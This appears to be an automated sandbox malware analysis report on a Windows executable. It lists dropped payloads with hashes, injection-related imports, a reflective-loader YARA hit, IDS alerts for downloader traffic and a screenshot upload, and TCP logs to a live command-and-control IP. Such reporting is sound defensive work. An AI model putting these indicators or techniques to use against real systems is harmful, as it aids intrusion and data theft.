                                                                                      SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-7.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32792
                                                                                      Entropy (8bit):6.372276555451265
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                      MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                      SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                      SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                      SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\python38.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4183112
                                                                                      Entropy (8bit):6.420172758698049
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                      MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                      SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                      SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                      SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):26696
                                                                                      Entropy (8bit):6.101296746249305
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                      MD5:6AE54D103866AAD6F58E119D27552131
                                                                                      SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                      SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                      SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\ucrtbase.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1046080
                                                                                      Entropy (8bit):6.649151787942547
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                      MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                      SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                      SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                      SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1096264
                                                                                      Entropy (8bit):5.343512979675051
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                      MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                      SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                      SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                      SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp1946.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1014784
                                                                                      Entropy (8bit):6.481015768352334
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:B7p+HXMi+1rY+HTXxkteD+e8tzNwH72X0P8tIZlZx1a3x/UBJ7tGaF:91VHTBKed8tzNwH72X002Zl43WB9g+
                                                                                      MD5:1A477A5659D817B01A50F2A80CB1D76E
                                                                                      SHA1:48A07F82C03C9A1B7B3C21CAF356F1C67775E359
                                                                                      SHA-256:1940BA18ED66DD2F1C3D4DBD2FBF6CF3438BCDEE1E108982FB557461106A8073
                                                                                      SHA-512:1689881E40ED47C7E2676DA05B82A518220FB7B2626C1365F4855FD5040432029E4F01D6113A8060DCF9657DF31A9DFAE238FA0ADC6FC8A59E2891F971E645FA
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Temp\tmp1946.exe, Author: ditekSHen
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J47.+Zd.+Zd.+Zd.SYe.+Zd.S_ek+Zde..d.+Zde.Ye.+Zde.^e.+Zde._e.+Zd.S^e.+Zd..^e.+Zd.].d.+Zd.+[d.*Zd.S[e.+Zd..Se.+Zd..Ze.+Zd..Xe.+ZdRich.+Zd........PE..d.....kg.........."....(.^...>.................@..........................................`.............................................X...h...................$................... ...8..............................@............p...............................text...|].......^.................. ..`.rdata...D...p...F...b..............@..@.data...`H.......&..................@....pdata..$...........................@..@.reloc...............f..............@..B........................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp8AEF.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5915951
                                                                                      Entropy (8bit):7.986095401359329
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:r+Aq2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFae/8+qUC:rd0HiouWJysVYvsOaoyMxxvjDDAx0avF
                                                                                      MD5:543FB2FD6424B11D72633914571E016C
                                                                                      SHA1:7EAE773DB47C118455F416B5D93E065729D45CF0
                                                                                      SHA-256:0BC67C0FA17DCADFE8A827CB413C090F67B0CB00A14705D95EC37766DE241665
                                                                                      SHA-512:590867FEC7C63E0A58BB419464304C4ABEA7936C6030537E851B68CD3CA8FDB847352BBFA111D8867F66FC35148D3BBF56270573BEED891C573679EBAB3C1520
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 26%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....dkg.........."....(.....X.................@....................................I/[...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\52kYJGCon6.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):584192
                                                                                      Entropy (8bit):6.629905796274471
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:LsZElcXVSjQnA+aanD/oCOJPVDWpOufdtaWsiv6AIEt:zcXVK7+rnD/oCOJPVDWptdgu
                                                                                      MD5:F5C5C9D5A779AD7077CCA7BEF57E94F0
                                                                                      SHA1:73F95BE3FBAA28192D8DFECE83F45AEC532EFFF2
                                                                                      SHA-256:3EB81910BA96D4C0564298528D93071947F0C4CB7C880AD4C5C31C49A41531B1
                                                                                      SHA-512:9C74521E0BC5F06F7FF06C398D946233F61E0177424E0ED5DD767D8BFC457A34EFD99B119BBBADF195F238C0C3C1F1F2330012D01489B5FE452A0190E044AC5E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P..\.............^..P....^.......^................c.....3]......3]......3]......Rich............................PE..d.....kg.........."......P..........,8.........@.............................`............`..................................................&..........(........6..............P.......................................p............`..P............................text... O.......P.................. ..`.rdata..d....`.......T..............@..@.data....Q...@..."...*..............@....pdata...6.......8...L..............@..@.rsrc...(...........................@..@.reloc..F...........................@..B.x64.....P.......F..............................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\52kYJGCon6.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Entropy (8bit):6.629905796274471
                                                                                      TrID:
                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:52kYJGCon6.exe
                                                                                      File size:584'192 bytes
                                                                                      MD5:f5c5c9d5a779ad7077cca7bef57e94f0
                                                                                      SHA1:73f95be3fbaa28192d8dfece83f45aec532efff2
                                                                                      SHA256:3eb81910ba96d4c0564298528d93071947f0c4cb7c880ad4c5c31c49a41531b1
                                                                                      SHA512:9c74521e0bc5f06f7ff06c398d946233f61e0177424e0ed5dd767d8bfc457a34efd99b119bbbadf195f238c0c3c1f1f2330012d01489b5fe452a0190e044ac5e
                                                                                      SSDEEP:12288:LsZElcXVSjQnA+aanD/oCOJPVDWpOufdtaWsiv6AIEt:zcXVK7+rnD/oCOJPVDWptdgu
                                                                                      TLSH:60C48D0B74A121E6F6BAE137C442653AF8BAF47642718707A750DA7B1B133E1AF1DB10
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P..\.............^..P....^.......^................c.....3]......3]......3]......Rich............................PE..d.....kg...

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x14002382c
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x676B06BF [Tue Dec 24 19:08:47 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:3c0878d96ac28fdbe9ddaee4c9d7430e

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007FEE8D06C268h
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      jmp 00007FEE8D065A27h
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      mov ecx, 00000003h
                                                                                      call 00007FEE8D06C20Fh
                                                                                      cmp eax, 01h
                                                                                      je 00007FEE8D065BC9h
                                                                                      mov ecx, 00000003h
                                                                                      call 00007FEE8D06C200h
                                                                                      test eax, eax
                                                                                      jne 00007FEE8D065BCFh
                                                                                      cmp dword ptr [00023168h], 01h
                                                                                      jne 00007FEE8D065BC6h
                                                                                      mov ecx, 000000FCh
                                                                                      call 00007FEE8D065BF5h
                                                                                      mov ecx, 000000FFh
                                                                                      call 00007FEE8D065BEBh
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      ret
                                                                                      int3
                                                                                      dec esp
                                                                                      lea ecx, dword ptr [00016405h]
                                                                                      xor edx, edx
                                                                                      dec ebp
                                                                                      mov eax, ecx
                                                                                      inc ecx
                                                                                      cmp ecx, dword ptr [eax]
                                                                                      je 00007FEE8D065BC4h
                                                                                      inc edx
                                                                                      dec ecx
                                                                                      add eax, 10h
                                                                                      dec eax
                                                                                      arpl dx, ax
                                                                                      dec eax
                                                                                      cmp eax, 17h
                                                                                      jc 00007FEE8D065B9Eh
                                                                                      xor eax, eax
                                                                                      ret
                                                                                      dec eax
                                                                                      arpl dx, ax
                                                                                      dec eax
                                                                                      add eax, eax
                                                                                      dec ecx
                                                                                      mov eax, dword ptr [ecx+eax*8+08h]
                                                                                      ret
                                                                                      int3
                                                                                      dec eax
                                                                                      mov dword ptr [esp+10h], ebx
                                                                                      dec eax
                                                                                      mov dword ptr [esp+18h], ebp
                                                                                      dec eax
                                                                                      mov dword ptr [esp+20h], esi
                                                                                      push edi
                                                                                      inc ecx
                                                                                      push esi
                                                                                      inc ecx
                                                                                      push edi
                                                                                      dec eax
                                                                                      sub esp, 00000250h
                                                                                      dec eax
                                                                                      mov eax, dword ptr [000216CAh]
                                                                                      dec eax
                                                                                      xor eax, esp
                                                                                      dec eax
                                                                                      mov dword ptr [esp+00000240h], eax
                                                                                      mov edi, ecx
                                                                                      call 00007FEE8D065B51h
                                                                                      xor esi, esi
                                                                                      dec eax
                                                                                      mov ebx, eax
                                                                                      dec eax
                                                                                      test eax, eax
                                                                                      je 00007FEE8D065D4Fh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [C++] VS2012 build 50727
                                                                                      • [RES] VS2012 build 50727
                                                                                      • [LNK] VS2012 build 50727

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x426b40xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x328.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4a0000x3684.pdata
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4f0000x650.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ee100x70.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x360000x450.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x34f200x35000cf393e20731d2ab7150235375ad86d60False0.42164467865566035data5.958954410758103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x360000xd5640xd60048d33e410136412e3289763134ef8a9dFalse0.3573853679906542data4.827771251326852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x440000x51880x22006a0a7288f88e7665ff9f5b2035c3c43cFalse0.2560891544117647data3.276417504620832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .pdata0x4a0000x36840x380064e7aef89a420ab6b545b755dc59fc8bFalse0.4467075892857143data5.371093520465766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x4e0000x3280x400afc7859aa58f88974d9c00a10e503687False0.361328125data2.6264502958855083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x4f0000x1b460x1c004a96da83210b3d552cda392312dda929False0.14369419642857142data1.8739563728647028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .x640x510000x450000x44600451b1d2808d300a701e03153dc6f2deeFalse0.44233103861974404data6.198787658476831IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x4e0600x2c4dataEnglishUnited States0.4717514124293785

                                                                                      Imports

                                                                                      DLLImport
                                                                                      WININET.dllInternetReadFile, InternetOpenUrlA, InternetCloseHandle, InternetOpenA
                                                                                      KERNEL32.dllGetModuleHandleA, GetProcAddress, GetSystemInfo, ExpandEnvironmentStringsW, GetCurrentDirectoryW, CreateFileW, GetFileSize, GetTempFileNameW, SetFilePointer, WriteFile, GetTempPathW, CloseHandle, DuplicateHandle, GetLastError, WaitForSingleObject, GetCurrentProcess, CreateThread, TerminateThread, GetExitCodeThread, ResumeThread, GetThreadContext, SetThreadContext, OpenProcess, GetSystemDirectoryW, VirtualAllocEx, WriteProcessMemory, WriteConsoleW, MapViewOfFile, UnmapViewOfFile, FreeLibrary, GetModuleFileNameW, Wow64GetThreadContext, Wow64SetThreadContext, lstrcatW, LoadLibraryA, LoadLibraryW, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, CreateFileA, SetFileAttributesA, GetVersionExW, lstrcmpA, lstrcpyA, lstrlenA, GetTempPathA, GetTempFileNameA, GetComputerNameA, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FlushFileBuffers, LocalFree, CreateFileMappingW, SetStdHandle, SetFilePointerEx, GetConsoleMode, GetConsoleCP, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSectionEx, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetLocaleInfoEx, EncodePointer, DecodePointer, WideCharToMultiByte, HeapFree, HeapAlloc, RaiseException, HeapReAlloc, GetCommandLineW, GetStdHandle, IsProcessorFeaturePresent, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, HeapSize, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, GetCurrentThreadId, GetProcessHeap, GetFileType, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetTickCount64, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, TerminateProcess, GetModuleHandleW, OutputDebugStringW, LoadLibraryExW, CompareStringEx
                                                                                      ADVAPI32.dllFreeSid, CheckTokenMembership, AllocateAndInitializeSid, GetUserNameA
                                                                                      SHELL32.dllShellExecuteExA
                                                                                      OLEAUT32.dllSysAllocString, VariantClear, SysFreeString
                                                                                      USERENV.dllCreateEnvironmentBlock
                                                                                      ntdll.dllRtlCaptureContext, RtlUnwindEx, RtlLookupFunctionEntry, RtlPcToFileHeader, NtReadVirtualMemory, NtQueryInformationProcess, RtlVirtualUnwind

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-26T12:05:06.143606+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549708185.81.68.14780TCP
                                                                                      2024-12-26T12:05:06.143606+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549708185.81.68.14780TCP
                                                                                      2024-12-26T12:05:18.248270+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549716185.81.68.14780TCP
                                                                                      2024-12-26T12:05:45.257802+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.2.549808185.81.68.14780TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 26, 2024 12:05:01.044250965 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.044382095 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.163837910 CET8049704185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:01.163856983 CET8049705185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:01.163914919 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.163948059 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.164187908 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.164652109 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:01.283725023 CET8049704185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:01.284360886 CET8049705185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.711452961 CET8049704185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.711483955 CET8049704185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.711513042 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.711548090 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.800512075 CET4970480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.909792900 CET4970680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.920135975 CET8049704185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.934142113 CET8049705185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.934185028 CET8049705185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:02.934223890 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.934276104 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:02.939774990 CET4970580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:03.029360056 CET8049706185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:03.029444933 CET4970680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:03.041512966 CET4970680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:03.059426069 CET8049705185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:03.156987906 CET4970780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:03.161055088 CET8049706185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:03.276484013 CET8049707185.81.68.147192.168.2.5
